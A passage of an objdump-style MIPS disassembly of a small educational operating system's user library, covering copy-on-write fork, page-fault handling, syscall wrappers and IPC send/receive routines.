400d68: 38420001 xori v0,v0,0x1
400d6c: 30420001 andi v0,v0,0x1
400d70: 10400007 beqz v0,400d90 <pgfault+0x54>
400d74: 2402f000 li v0,-4096
400d78: 3c040040 lui a0,0x40
400d7c: 2484726c addiu a0,a0,29292
400d80: 2405005e li a1,94
400d84: 3c060040 lui a2,0x40
400d88: 0c100096 jal 400258 <_user_panic>
400d8c: 24c67274 addiu a2,a2,29300
400d90: 00828824 and s1,a0,v0
400d94: 00002021 move a0,zero
400d98: 3c057f3f lui a1,0x7f3f
400d9c: 34a5e000 ori a1,a1,0xe000
400da0: 0c100570 jal 4015c0 <syscall_mem_alloc>
400da4: 24060600 li a2,1536
400da8: 04410007 bgez v0,400dc8 <pgfault+0x8c>
400dac: 02202021 move a0,s1
400db0: 3c040040 lui a0,0x40
400db4: 2484726c addiu a0,a0,29292
400db8: 24050066 li a1,102
400dbc: 3c060040 lui a2,0x40
400dc0: 0c100096 jal 400258 <_user_panic>
400dc4: 24c672a0 addiu a2,a2,29344
400dc8: 3c107f3f lui s0,0x7f3f
400dcc: 3605e000 ori a1,s0,0xe000
400dd0: 0c100322 jal 400c88 <user_bcopy>
400dd4: 24061000 li a2,4096
400dd8: 24020600 li v0,1536
400ddc: afa20010 sw v0,16(sp)
400de0: 00002021 move a0,zero
400de4: 3605e000 ori a1,s0,0xe000
400de8: 00003021 move a2,zero
400dec: 0c10057f jal 4015fc <syscall_mem_map>
400df0: 02203821 move a3,s1
400df4: 04410007 bgez v0,400e14 <pgfault+0xd8>
400df8: 00002021 move a0,zero
400dfc: 3c040040 lui a0,0x40
400e00: 2484726c addiu a0,a0,29292
400e04: 2405006e li a1,110
400e08: 3c060040 lui a2,0x40
400e0c: 0c100096 jal 400258 <_user_panic>
400e10: 24c672c8 addiu a2,a2,29384
400e14: 3c057f3f lui a1,0x7f3f
400e18: 0c100591 jal 401644 <syscall_mem_unmap>
400e1c: 34a5e000 ori a1,a1,0xe000
400e20: 04410006 bgez v0,400e3c <pgfault+0x100>
400e24: 3c040040 lui a0,0x40
400e28: 2484726c addiu a0,a0,29292
400e2c: 24050073 li a1,115
400e30: 3c060040 lui a2,0x40
400e34: 0c100096 jal 400258 <_user_panic>
400e38: 24c672ec addiu a2,a2,29420
400e3c: 8fbf0020 lw ra,32(sp)
400e40: 8fb1001c lw s1,28(sp)
400e44: 8fb00018 lw s0,24(sp)
400e48: 03e00008 jr ra
400e4c: 27bd0028 addiu sp,sp,40
00400e50 <duppage>:
400e50: 27bdffd8 addiu sp,sp,-40
400e54: afbf0020 sw ra,32(sp)
400e58: afb1001c sw s1,28(sp)
400e5c: afb00018 sw s0,24(sp)
400e60: 00803021 move a2,a0
400e64: 00058300 sll s0,a1,0xc
400e68: 3c020040 lui v0,0x40
400e6c: 8c426008 lw v0,24584(v0)
400e70: 00052880 sll a1,a1,0x2
400e74: 00a22821 addu a1,a1,v0
400e78: 8ca50000 lw a1,0(a1)
400e7c: 00000000 nop
400e80: 30a20400 andi v0,a1,0x400
400e84: 1440000d bnez v0,400ebc <duppage+0x6c>
400e88: 30a30fff andi v1,a1,0xfff
400e8c: afa30010 sw v1,16(sp)
400e90: 00002021 move a0,zero
400e94: 02002821 move a1,s0
400e98: 0c10057f jal 4015fc <syscall_mem_map>
400e9c: 02003821 move a3,s0
400ea0: 1040003c beqz v0,400f94 <duppage+0x144>
400ea4: 3c040040 lui a0,0x40
400ea8: 2484726c addiu a0,a0,29292
400eac: 24050097 li a1,151
400eb0: 3c060040 lui a2,0x40
400eb4: 0c100096 jal 400258 <_user_panic>
400eb8: 24c67314 addiu a2,a2,29460
400ebc: 30620004 andi v0,v1,0x4
400ec0: 1040000d beqz v0,400ef8 <duppage+0xa8>
400ec4: 30a20001 andi v0,a1,0x1
400ec8: afa30010 sw v1,16(sp)
400ecc: 00002021 move a0,zero
400ed0: 02002821 move a1,s0
400ed4: 0c10057f jal 4015fc <syscall_mem_map>
400ed8: 02003821 move a3,s0
400edc: 1040002d beqz v0,400f94 <duppage+0x144>
400ee0: 3c040040 lui a0,0x40
400ee4: 2484726c addiu a0,a0,29292
400ee8: 2405009c li a1,156
400eec: 3c060040 lui a2,0x40
400ef0: 0c100096 jal 400258 <_user_panic>
400ef4: 24c67334 addiu a2,a2,29492
400ef8: 1040000d beqz v0,400f30 <duppage+0xe0>
400efc: 34710001 ori s1,v1,0x1
400f00: afa30010 sw v1,16(sp)
400f04: 00002021 move a0,zero
400f08: 02002821 move a1,s0
400f0c: 0c10057f jal 4015fc <syscall_mem_map>
400f10: 02003821 move a3,s0
400f14: 1040001f beqz v0,400f94 <duppage+0x144>
400f18: 3c040040 lui a0,0x40
400f1c: 2484726c addiu a0,a0,29292
400f20: 240500a1 li a1,161
400f24: 3c060040 lui a2,0x40
400f28: 0c100096 jal 400258 <_user_panic>
400f2c: 24c67350 addiu a2,a2,29520
400f30: afb10010 sw s1,16(sp)
400f34: 00002021 move a0,zero
400f38: 02002821 move a1,s0
400f3c: 0c10057f jal 4015fc <syscall_mem_map>
400f40: 02003821 move a3,s0
400f44: 10400007 beqz v0,400f64 <duppage+0x114>
400f48: 00002021 move a0,zero
400f4c: 3c040040 lui a0,0x40
400f50: 2484726c addiu a0,a0,29292
400f54: 240500aa li a1,170
400f58: 3c060040 lui a2,0x40
400f5c: 0c100096 jal 400258 <_user_panic>
400f60: 24c67384 addiu a2,a2,29572
400f64: afb10010 sw s1,16(sp)
400f68: 02002821 move a1,s0
400f6c: 00003021 move a2,zero
400f70: 0c10057f jal 4015fc <syscall_mem_map>
400f74: 02003821 move a3,s0
400f78: 10400006 beqz v0,400f94 <duppage+0x144>
400f7c: 3c040040 lui a0,0x40
400f80: 2484726c addiu a0,a0,29292
400f84: 240500ad li a1,173
400f88: 3c060040 lui a2,0x40
400f8c: 0c100096 jal 400258 <_user_panic>
400f90: 24c673b0 addiu a2,a2,29616
400f94: 8fbf0020 lw ra,32(sp)
400f98: 8fb1001c lw s1,28(sp)
400f9c: 8fb00018 lw s0,24(sp)
400fa0: 03e00008 jr ra
400fa4: 27bd0028 addiu sp,sp,40
00400fa8 <fork>:
400fa8: 27bdffd0 addiu sp,sp,-48
400fac: afbf002c sw ra,44(sp)
400fb0: afb40028 sw s4,40(sp)
400fb4: afb30024 sw s3,36(sp)
400fb8: afb20020 sw s2,32(sp)
400fbc: afb1001c sw s1,28(sp)
400fc0: afb00018 sw s0,24(sp)
400fc4: 3c040040 lui a0,0x40
400fc8: 0c10050c jal 401430 <set_pgfault_handler>
400fcc: 24840d3c addiu a0,a0,3388
400fd0: afa00010 sw zero,16(sp)
400fd4: afa00014 sw zero,20(sp)
400fd8: 2404253f li a0,9535
400fdc: 00002821 move a1,zero
400fe0: 00003021 move a2,zero
400fe4: 0c100030 jal 4000c0 <msyscall>
400fe8: 00003821 move a3,zero
400fec: 14400011 bnez v0,401034 <fork+0x8c>
400ff0: 0040a021 move s4,v0
400ff4: 0c10053a jal 4014e8 <syscall_getenvid>
400ff8: 00000000 nop
400ffc: 304203ff andi v0,v0,0x3ff
401000: 00022080 sll a0,v0,0x2
401004: 00021940 sll v1,v0,0x5
401008: 00641823 subu v1,v1,a0
40100c: 00621821 addu v1,v1,v0
401010: 000318c0 sll v1,v1,0x3
401014: 3c020040 lui v0,0x40
401018: 8c426000 lw v0,24576(v0)
40101c: 00000000 nop
401020: 00621821 addu v1,v1,v0
401024: 3c020041 lui v0,0x41
401028: ac438004 sw v1,-32764(v0)
40102c: 1000003f b 40112c <fork+0x184>
401030: 00001021 move v0,zero
401034: 00008021 move s0,zero
401038: 3c120040 lui s2,0x40
40103c: 3c130040 lui s3,0x40
401040: 3c027f3f lui v0,0x7f3f
401044: 3451e000 ori s1,v0,0xe000
401048: 00101582 srl v0,s0,0x16
40104c: 8e43600c lw v1,24588(s2)
401050: 00021080 sll v0,v0,0x2
401054: 00431021 addu v0,v0,v1
401058: 8c420000 lw v0,0(v0)
40105c: 00000000 nop
401060: 30420200 andi v0,v0,0x200
401064: 1040000b beqz v0,401094 <fork+0xec>
401068: 00102b02 srl a1,s0,0xc
40106c: 8e626008 lw v0,24584(s3)
401070: 00051880 sll v1,a1,0x2
401074: 00621821 addu v1,v1,v0
401078: 8c620000 lw v0,0(v1)
40107c: 00000000 nop
401080: 30420200 andi v0,v0,0x200
401084: 10400003 beqz v0,401094 <fork+0xec>
401088: 00000000 nop
40108c: 0c100394 jal 400e50 <duppage>
401090: 02802021 move a0,s4
401094: 26101000 addiu s0,s0,4096
401098: 1611ffec bne s0,s1,40104c <fork+0xa4>
40109c: 00101582 srl v0,s0,0x16
4010a0: 02802021 move a0,s4
4010a4: 3c057f3f lui a1,0x7f3f
4010a8: 34a5f000 ori a1,a1,0xf000
4010ac: 0c100570 jal 4015c0 <syscall_mem_alloc>
4010b0: 24060600 li a2,1536
4010b4: 04410007 bgez v0,4010d4 <fork+0x12c>
4010b8: 02802021 move a0,s4
4010bc: 3c040040 lui a0,0x40
4010c0: 2484726c addiu a0,a0,29292
4010c4: 240500e0 li a1,224
4010c8: 3c060040 lui a2,0x40
4010cc: 0c100096 jal 400258 <_user_panic>
4010d0: 24c673dc addiu a2,a2,29660
4010d4: 3c050040 lui a1,0x40
4010d8: 24a50014 addiu a1,a1,20
4010dc: 0c100561 jal 401584 <syscall_set_pgfault_handler>
4010e0: 3c067f40 lui a2,0x7f40
4010e4: 04410007 bgez v0,401104 <fork+0x15c>
4010e8: 02802021 move a0,s4
4010ec: 3c040040 lui a0,0x40
4010f0: 2484726c addiu a0,a0,29292
4010f4: 240500e4 li a1,228
4010f8: 3c060040 lui a2,0x40
4010fc: 0c100096 jal 400258 <_user_panic>
401100: 24c673f4 addiu a2,a2,29684
401104: 0c10059f jal 40167c <syscall_set_env_status>
401108: 24050001 li a1,1
40110c: 04410007 bgez v0,40112c <fork+0x184>
401110: 02801021 move v0,s4
401114: 3c040040 lui a0,0x40
401118: 2484726c addiu a0,a0,29292
40111c: 240500e8 li a1,232
401120: 3c060040 lui a2,0x40
401124: 0c100096 jal 400258 <_user_panic>
401128: 24c67418 addiu a2,a2,29720
40112c: 8fbf002c lw ra,44(sp)
401130: 8fb40028 lw s4,40(sp)
401134: 8fb30024 lw s3,36(sp)
401138: 8fb20020 lw s2,32(sp)
40113c: 8fb1001c lw s1,28(sp)
401140: 8fb00018 lw s0,24(sp)
401144: 03e00008 jr ra
401148: 27bd0030 addiu sp,sp,48
0040114c <myduppage>:
40114c: 27bdffd0 addiu sp,sp,-48
401150: afbf0028 sw ra,40(sp)
401154: afb30024 sw s3,36(sp)
401158: afb20020 sw s2,32(sp)
40115c: afb1001c sw s1,28(sp)
401160: afb00018 sw s0,24(sp)
401164: 00809821 move s3,a0
401168: 00058880 sll s1,a1,0x2
40116c: 3c120040 lui s2,0x40
401170: 8e426008 lw v0,24584(s2)
401174: 00000000 nop
401178: 00511021 addu v0,v0,s1
40117c: 8c420000 lw v0,0(v0)
401180: 00000000 nop
401184: 30430fff andi v1,v0,0xfff
401188: 30420001 andi v0,v0,0x1
40118c: 10400013 beqz v0,4011dc <myduppage+0x90>
401190: 00058300 sll s0,a1,0xc
401194: 0c10034f jal 400d3c <pgfault>
401198: 02002021 move a0,s0
40119c: 8e426008 lw v0,24584(s2)
4011a0: 00000000 nop
4011a4: 02221021 addu v0,s1,v0
4011a8: 8c420000 lw v0,0(v0)
4011ac: 00000000 nop
4011b0: 30420fff andi v0,v0,0xfff
4011b4: afa20010 sw v0,16(sp)
4011b8: 00002021 move a0,zero
4011bc: 02002821 move a1,s0
4011c0: 02603021 move a2,s3
4011c4: 0c10057f jal 4015fc <syscall_mem_map>
4011c8: 02003821 move a3,s0
4011cc: 04410009 bgez v0,4011f4 <myduppage+0xa8>
4011d0: 00000000 nop
4011d4: 10000007 b 4011f4 <myduppage+0xa8>
4011d8: 00000000 nop
4011dc: afa30010 sw v1,16(sp)
4011e0: 00002021 move a0,zero
4011e4: 02002821 move a1,s0
4011e8: 02603021 move a2,s3
4011ec: 0c10057f jal 4015fc <syscall_mem_map>
4011f0: 02003821 move a3,s0
4011f4: 8fbf0028 lw ra,40(sp)
4011f8: 8fb30024 lw s3,36(sp)
4011fc: 8fb20020 lw s2,32(sp)
401200: 8fb1001c lw s1,28(sp)
401204: 8fb00018 lw s0,24(sp)
401208: 03e00008 jr ra
40120c: 27bd0030 addiu sp,sp,48
00401210 <tfork>:
401210: 27bdffc8 addiu sp,sp,-56
401214: afbf0030 sw ra,48(sp)
401218: afb5002c sw s5,44(sp)
40121c: afb40028 sw s4,40(sp)
401220: afb30024 sw s3,36(sp)
401224: afb20020 sw s2,32(sp)
401228: afb1001c sw s1,28(sp)
40122c: 0c100318 jal 400c60 <uget_sp>
401230: afb00018 sw s0,24(sp)
401234: 0040a821 move s5,v0
401238: 3c040040 lui a0,0x40
40123c: 0c10050c jal 401430 <set_pgfault_handler>
401240: 24840d3c addiu a0,a0,3388
401244: afa00010 sw zero,16(sp)
401248: afa00014 sw zero,20(sp)
40124c: 2404253f li a0,9535
401250: 00002821 move a1,zero
401254: 00003021 move a2,zero
401258: 0c100030 jal 4000c0 <msyscall>
40125c: 00003821 move a3,zero
401260: 14400011 bnez v0,4012a8 <tfork+0x98>
401264: 0040a021 move s4,v0
401268: 0c10053a jal 4014e8 <syscall_getenvid>
40126c: 00000000 nop
401270: 304203ff andi v0,v0,0x3ff
401274: 00022080 sll a0,v0,0x2
401278: 00021940 sll v1,v0,0x5
40127c: 00641823 subu v1,v1,a0
401280: 00621821 addu v1,v1,v0
401284: 000318c0 sll v1,v1,0x3
401288: 3c020040 lui v0,0x40
40128c: 8c426000 lw v0,24576(v0)
401290: 00000000 nop
401294: 00621821 addu v1,v1,v0
401298: 3c020041 lui v0,0x41
40129c: ac438004 sw v1,-32764(v0)
4012a0: 10000052 b 4013ec <tfork+0x1dc>
4012a4: 00001021 move v0,zero
4012a8: 00008021 move s0,zero
4012ac: 3c120040 lui s2,0x40
4012b0: 3c130040 lui s3,0x40
4012b4: 3c027f01 lui v0,0x7f01
4012b8: 34516000 ori s1,v0,0x6000
4012bc: 00101582 srl v0,s0,0x16
4012c0: 8e43600c lw v1,24588(s2)
4012c4: 00021080 sll v0,v0,0x2
4012c8: 00431021 addu v0,v0,v1
4012cc: 8c420000 lw v0,0(v0)
4012d0: 00000000 nop
4012d4: 30420200 andi v0,v0,0x200
4012d8: 1040000d beqz v0,401310 <tfork+0x100>
4012dc: 00102b02 srl a1,s0,0xc
4012e0: 8e626008 lw v0,24584(s3)
4012e4: 00051880 sll v1,a1,0x2
4012e8: 00621821 addu v1,v1,v0
4012ec: 8c620000 lw v0,0(v1)
4012f0: 00000000 nop
4012f4: 30420200 andi v0,v0,0x200
4012f8: 10400005 beqz v0,401310 <tfork+0x100>
4012fc: 00000000 nop
401300: 0c100453 jal 40114c <myduppage>
401304: 02802021 move a0,s4
401308: 04400038 bltz v0,4013ec <tfork+0x1dc>
40130c: 00001021 move v0,zero
401310: 26101000 addiu s0,s0,4096
401314: 1611ffea bne s0,s1,4012c0 <tfork+0xb0>
401318: 00101582 srl v0,s0,0x16
40131c: 3c02ffc1 lui v0,0xffc1
401320: 34428000 ori v0,v0,0x8000
401324: 02a28021 addu s0,s5,v0
401328: 3c027f3f lui v0,0x7f3f
40132c: 3442dfff ori v0,v0,0xdfff
401330: 0050102b sltu v0,v0,s0
401334: 1440001b bnez v0,4013a4 <tfork+0x194>
401338: 3c027f3f lui v0,0x7f3f
40133c: 3c110040 lui s1,0x40
401340: 3c120040 lui s2,0x40
401344: 3453dfff ori s3,v0,0xdfff
401348: 00101582 srl v0,s0,0x16
40134c: 8e23600c lw v1,24588(s1)
401350: 00021080 sll v0,v0,0x2
401354: 00431021 addu v0,v0,v1
401358: 8c420000 lw v0,0(v0)
40135c: 00000000 nop
401360: 30420200 andi v0,v0,0x200
401364: 1040000b beqz v0,401394 <tfork+0x184>
401368: 00102b02 srl a1,s0,0xc
40136c: 8e426008 lw v0,24584(s2)
401370: 00051880 sll v1,a1,0x2
401374: 00621821 addu v1,v1,v0
401378: 8c620000 lw v0,0(v1)
40137c: 00000000 nop
401380: 30420200 andi v0,v0,0x200
401384: 10400003 beqz v0,401394 <tfork+0x184>
401388: 00000000 nop
40138c: 0c100394 jal 400e50 <duppage>
401390: 02802021 move a0,s4
401394: 26101000 addiu s0,s0,4096
401398: 0270102b sltu v0,s3,s0
40139c: 1040ffeb beqz v0,40134c <tfork+0x13c>
4013a0: 00101582 srl v0,s0,0x16
4013a4: 02802021 move a0,s4
4013a8: 3c057f3f lui a1,0x7f3f
4013ac: 34a5f000 ori a1,a1,0xf000
4013b0: 0c100570 jal 4015c0 <syscall_mem_alloc>
4013b4: 24060600 li a2,1536
4013b8: 0440000c bltz v0,4013ec <tfork+0x1dc>
4013bc: 02802021 move a0,s4
4013c0: 3c050040 lui a1,0x40
4013c4: 24a50014 addiu a1,a1,20
4013c8: 0c100561 jal 401584 <syscall_set_pgfault_handler>
4013cc: 3c067f40 lui a2,0x7f40
4013d0: 04400006 bltz v0,4013ec <tfork+0x1dc>
4013d4: 02802021 move a0,s4
4013d8: 0c10059f jal 40167c <syscall_set_env_status>
4013dc: 24050001 li a1,1
4013e0: 04400002 bltz v0,4013ec <tfork+0x1dc>
4013e4: 00000000 nop
4013e8: 02801021 move v0,s4
4013ec: 8fbf0030 lw ra,48(sp)
4013f0: 8fb5002c lw s5,44(sp)
4013f4: 8fb40028 lw s4,40(sp)
4013f8: 8fb30024 lw s3,36(sp)
4013fc: 8fb20020 lw s2,32(sp)
401400: 8fb1001c lw s1,28(sp)
401404: 8fb00018 lw s0,24(sp)
401408: 03e00008 jr ra
40140c: 27bd0038 addiu sp,sp,56
00401410 <sfork>:
401410: 27bdffe8 addiu sp,sp,-24
401414: afbf0010 sw ra,16(sp)
401418: 3c040040 lui a0,0x40
40141c: 2484726c addiu a0,a0,29292
401420: 2405014c li a1,332
401424: 3c060040 lui a2,0x40
401428: 0c100096 jal 400258 <_user_panic>
40142c: 24c67430 addiu a2,a2,29744
00401430 <set_pgfault_handler>:
401430: 27bdffe8 addiu sp,sp,-24
401434: afbf0014 sw ra,20(sp)
401438: afb00010 sw s0,16(sp)
40143c: 3c020040 lui v0,0x40
401440: 8c426010 lw v0,24592(v0)
401444: 00000000 nop
401448: 14400013 bnez v0,401498 <set_pgfault_handler+0x68>
40144c: 00808021 move s0,a0
401450: 00002021 move a0,zero
401454: 3c057f3f lui a1,0x7f3f
401458: 34a5f000 ori a1,a1,0xf000
40145c: 0c100570 jal 4015c0 <syscall_mem_alloc>
401460: 24060600 li a2,1536
401464: 04400007 bltz v0,401484 <set_pgfault_handler+0x54>
401468: 3c050040 lui a1,0x40
40146c: 00002021 move a0,zero
401470: 24a50014 addiu a1,a1,20
401474: 0c100561 jal 401584 <syscall_set_pgfault_handler>
401478: 3c067f40 lui a2,0x7f40
40147c: 04410007 bgez v0,40149c <set_pgfault_handler+0x6c>
401480: 3c020040 lui v0,0x40
401484: 3c040040 lui a0,0x40
401488: 0c100086 jal 400218 <writef>
40148c: 24847448 addiu a0,a0,29768
401490: 10000003 b 4014a0 <set_pgfault_handler+0x70>
401494: 00000000 nop
401498: 3c020040 lui v0,0x40
40149c: ac506010 sw s0,24592(v0)
4014a0: 8fbf0014 lw ra,20(sp)
4014a4: 8fb00010 lw s0,16(sp)
4014a8: 03e00008 jr ra
4014ac: 27bd0018 addiu sp,sp,24
004014b0 <syscall_putchar>:
4014b0: 27bdffe0 addiu sp,sp,-32
4014b4: afbf0018 sw ra,24(sp)
4014b8: 00042e00 sll a1,a0,0x18
4014bc: 00052e03 sra a1,a1,0x18
4014c0: afa00010 sw zero,16(sp)
4014c4: afa00014 sw zero,20(sp)
4014c8: 24042537 li a0,9527
4014cc: 00003021 move a2,zero
4014d0: 0c100030 jal 4000c0 <msyscall>
4014d4: 00003821 move a3,zero
4014d8: 8fbf0018 lw ra,24(sp)
4014dc: 00000000 nop
4014e0: 03e00008 jr ra
4014e4: 27bd0020 addiu sp,sp,32
004014e8 <syscall_getenvid>:
4014e8: 27bdffe0 addiu sp,sp,-32
4014ec: afbf0018 sw ra,24(sp)
4014f0: afa00010 sw zero,16(sp)
4014f4: afa00014 sw zero,20(sp)
4014f8: 24042538 li a0,9528
4014fc: 00002821 move a1,zero
401500: 00003021 move a2,zero
401504: 0c100030 jal 4000c0 <msyscall>
401508: 00003821 move a3,zero
40150c: 8fbf0018 lw ra,24(sp)
401510: 00000000 nop
401514: 03e00008 jr ra
401518: 27bd0020 addiu sp,sp,32
0040151c <syscall_yield>:
40151c: 27bdffe0 addiu sp,sp,-32
401520: afbf0018 sw ra,24(sp)
401524: afa00010 sw zero,16(sp)
401528: afa00014 sw zero,20(sp)
40152c: 24042539 li a0,9529
401530: 00002821 move a1,zero
401534: 00003021 move a2,zero
401538: 0c100030 jal 4000c0 <msyscall>
40153c: 00003821 move a3,zero
401540: 8fbf0018 lw ra,24(sp)
401544: 00000000 nop
401548: 03e00008 jr ra
40154c: 27bd0020 addiu sp,sp,32
00401550 <syscall_env_destroy>:
401550: 27bdffe0 addiu sp,sp,-32
401554: afbf0018 sw ra,24(sp)
401558: 00802821 move a1,a0
40155c: afa00010 sw zero,16(sp)
401560: afa00014 sw zero,20(sp)
401564: 2404253a li a0,9530
401568: 00003021 move a2,zero
40156c: 0c100030 jal 4000c0 <msyscall>
401570: 00003821 move a3,zero
401574: 8fbf0018 lw ra,24(sp)
401578: 00000000 nop
40157c: 03e00008 jr ra
401580: 27bd0020 addiu sp,sp,32
00401584 <syscall_set_pgfault_handler>:
401584: 27bdffe0 addiu sp,sp,-32
401588: afbf0018 sw ra,24(sp)
40158c: 00801021 move v0,a0
401590: 00a01821 move v1,a1
401594: 00c03821 move a3,a2
401598: afa00010 sw zero,16(sp)
40159c: afa00014 sw zero,20(sp)
4015a0: 2404253b li a0,9531
4015a4: 00402821 move a1,v0
4015a8: 0c100030 jal 4000c0 <msyscall>
4015ac: 00603021 move a2,v1
4015b0: 8fbf0018 lw ra,24(sp)
4015b4: 00000000 nop
4015b8: 03e00008 jr ra
4015bc: 27bd0020 addiu sp,sp,32
004015c0 <syscall_mem_alloc>:
4015c0: 27bdffe0 addiu sp,sp,-32
4015c4: afbf0018 sw ra,24(sp)
4015c8: 00801021 move v0,a0
4015cc: 00a01821 move v1,a1
4015d0: 00c03821 move a3,a2
4015d4: afa00010 sw zero,16(sp)
4015d8: afa00014 sw zero,20(sp)
4015dc: 2404253c li a0,9532
4015e0: 00402821 move a1,v0
4015e4: 0c100030 jal 4000c0 <msyscall>
4015e8: 00603021 move a2,v1
4015ec: 8fbf0018 lw ra,24(sp)
4015f0: 00000000 nop
4015f4: 03e00008 jr ra
4015f8: 27bd0020 addiu sp,sp,32
004015fc <syscall_mem_map>:
4015fc: 27bdffe0 addiu sp,sp,-32
401600: afbf0018 sw ra,24(sp)
401604: 00801821 move v1,a0
401608: 00a04021 move t0,a1
40160c: 00c04821 move t1,a2
401610: afa70010 sw a3,16(sp)
401614: 8fa20030 lw v0,48(sp)
401618: 00000000 nop
40161c: afa20014 sw v0,20(sp)
401620: 2404253d li a0,9533
401624: 00602821 move a1,v1
401628: 01003021 move a2,t0
40162c: 0c100030 jal 4000c0 <msyscall>
401630: 01203821 move a3,t1
401634: 8fbf0018 lw ra,24(sp)
401638: 00000000 nop
40163c: 03e00008 jr ra
401640: 27bd0020 addiu sp,sp,32
00401644 <syscall_mem_unmap>:
401644: 27bdffe0 addiu sp,sp,-32
401648: afbf0018 sw ra,24(sp)
40164c: 00801021 move v0,a0
401650: 00a03021 move a2,a1
401654: afa00010 sw zero,16(sp)
401658: afa00014 sw zero,20(sp)
40165c: 2404253e li a0,9534
401660: 00402821 move a1,v0
401664: 0c100030 jal 4000c0 <msyscall>
401668: 00003821 move a3,zero
40166c: 8fbf0018 lw ra,24(sp)
401670: 00000000 nop
401674: 03e00008 jr ra
401678: 27bd0020 addiu sp,sp,32
0040167c <syscall_set_env_status>:
40167c: 27bdffe0 addiu sp,sp,-32
401680: afbf0018 sw ra,24(sp)
401684: 00801021 move v0,a0
401688: 00a03021 move a2,a1
40168c: afa00010 sw zero,16(sp)
401690: afa00014 sw zero,20(sp)
401694: 24042540 li a0,9536
401698: 00402821 move a1,v0
40169c: 0c100030 jal 4000c0 <msyscall>
4016a0: 00003821 move a3,zero
4016a4: 8fbf0018 lw ra,24(sp)
4016a8: 00000000 nop
4016ac: 03e00008 jr ra
4016b0: 27bd0020 addiu sp,sp,32
004016b4 <syscall_set_trapframe>:
4016b4: 27bdffe0 addiu sp,sp,-32
4016b8: afbf0018 sw ra,24(sp)
4016bc: 00801021 move v0,a0
4016c0: 00a03021 move a2,a1
4016c4: afa00010 sw zero,16(sp)
4016c8: afa00014 sw zero,20(sp)
4016cc: 24042541 li a0,9537
4016d0: 00402821 move a1,v0
4016d4: 0c100030 jal 4000c0 <msyscall>
4016d8: 00003821 move a3,zero
4016dc: 8fbf0018 lw ra,24(sp)
4016e0: 00000000 nop
4016e4: 03e00008 jr ra
4016e8: 27bd0020 addiu sp,sp,32
004016ec <syscall_panic>:
4016ec: 27bdffe0 addiu sp,sp,-32
4016f0: afbf0018 sw ra,24(sp)
4016f4: 00802821 move a1,a0
4016f8: afa00010 sw zero,16(sp)
4016fc: afa00014 sw zero,20(sp)
401700: 24042542 li a0,9538
401704: 00003021 move a2,zero
401708: 0c100030 jal 4000c0 <msyscall>
40170c: 00003821 move a3,zero
401710: 8fbf0018 lw ra,24(sp)
401714: 00000000 nop
401718: 03e00008 jr ra
40171c: 27bd0020 addiu sp,sp,32
00401720 <syscall_ipc_can_send>:
401720: 27bdffe0 addiu sp,sp,-32
401724: afbf0018 sw ra,24(sp)
401728: 00801021 move v0,a0
40172c: 00a01821 move v1,a1
401730: 00c04021 move t0,a2
401734: afa70010 sw a3,16(sp)
401738: afa00014 sw zero,20(sp)
40173c: 24042543 li a0,9539
401740: 00402821 move a1,v0
401744: 00603021 move a2,v1
401748: 0c100030 jal 4000c0 <msyscall>
40174c: 01003821 move a3,t0
401750: 8fbf0018 lw ra,24(sp)
401754: 00000000 nop
401758: 03e00008 jr ra
40175c: 27bd0020 addiu sp,sp,32
00401760 <syscall_ipc_recv>:
401760: 27bdffe0 addiu sp,sp,-32
401764: afbf0018 sw ra,24(sp)
401768: 00802821 move a1,a0
40176c: afa00010 sw zero,16(sp)
401770: afa00014 sw zero,20(sp)
401774: 24042544 li a0,9540
401778: 00003021 move a2,zero
40177c: 0c100030 jal 4000c0 <msyscall>
401780: 00003821 move a3,zero
401784: 8fbf0018 lw ra,24(sp)
401788: 00000000 nop
40178c: 03e00008 jr ra
401790: 27bd0020 addiu sp,sp,32
00401794 <syscall_cgetc>:
401794: 27bdffe0 addiu sp,sp,-32
401798: afbf0018 sw ra,24(sp)
40179c: afa00010 sw zero,16(sp)
4017a0: afa00014 sw zero,20(sp)
4017a4: 24042545 li a0,9541
4017a8: 00002821 move a1,zero
4017ac: 00003021 move a2,zero
4017b0: 0c100030 jal 4000c0 <msyscall>
4017b4: 00003821 move a3,zero
4017b8: 8fbf0018 lw ra,24(sp)
4017bc: 00000000 nop
4017c0: 03e00008 jr ra
4017c4: 27bd0020 addiu sp,sp,32
...
004017d0 <ipc_send>:
4017d0: 27bdffd8 addiu sp,sp,-40
4017d4: afbf0024 sw ra,36(sp)
4017d8: afb40020 sw s4,32(sp)
4017dc: afb3001c sw s3,28(sp)
4017e0: afb20018 sw s2,24(sp)
4017e4: afb10014 sw s1,20(sp)
4017e8: afb00010 sw s0,16(sp)
4017ec: 0080a021 move s4,a0
4017f0: 00a09821 move s3,a1
4017f4: 00c09021 move s2,a2
4017f8: 00e08821 move s1,a3
4017fc: 10000003 b 40180c <ipc_send+0x3c>
401800: 2410fffa li s0,-6
401804: 0c100547 jal 40151c <syscall_yield>
401808: 00000000 nop
40180c: 02802021 move a0,s4
401810: 02602821 move a1,s3
401814: 02403021 move a2,s2
401818: 0c1005c8 jal 401720 <syscall_ipc_can_send>
40181c: 02203821 move a3,s1
401820: 1050fff8 beq v0,s0,401804 <ipc_send+0x34>
401824: 00000000 nop
401828: 10400007 beqz v0,401848 <ipc_send+0x78>
40182c: 3c040040 lui a0,0x40
401830: 24847464 addiu a0,a0,29796
401834: 2405001c li a1,28
401838: 3c060040 lui a2,0x40
40183c: 24c6746c addiu a2,a2,29804
401840: 0c100096 jal 400258 <_user_panic>
401844: 00403821 move a3,v0
401848: 8fbf0024 lw ra,36(sp)
40184c: 8fb40020 lw s4,32(sp)
401850: 8fb3001c lw s3,28(sp)
401854: 8fb20018 lw s2,24(sp)
401858: 8fb10014 lw s1,20(sp)
40185c: 8fb00010 lw s0,16(sp)
401860: 03e00008 jr ra
401864: 27bd0028 addiu sp,sp,40
00401868 <ipc_recv>:
401868: 27bdffe0 addiu sp,sp,-32
40186c: afbf0018 sw ra,24(sp)
401870: afb10014 sw s1,20(sp)
401874: afb00010 sw s0,16(sp)
401878: 00808021 move s0,a0
40187c: 00c08821 move s1,a2
401880: 0c1005d8 jal 401760 <syscall_ipc_recv>
401884: 00a02021 move a0,a1
401888: 12000006 beqz s0,4018a4 <ipc_recv+0x3c>
40188c: 3c020041 lui v0,0x41
401890: 8c428004 lw v0,-32764(v0)
401894: 00000000 nop
401898: 8c4200c8 lw v0,200(v0)
40189c: 00000000 nop
4018a0: ae020000 sw v0,0(s0)
4018a4: 12200006 beqz s1,4018c0 <ipc_recv+0x58>
4018a8: 3c020041 lui v0,0x41
4018ac: 8c428004 lw v0,-32764(v0)
4018b0: 00000000 nop
4018b4: 8c4200d4 lw v0,212(v0)
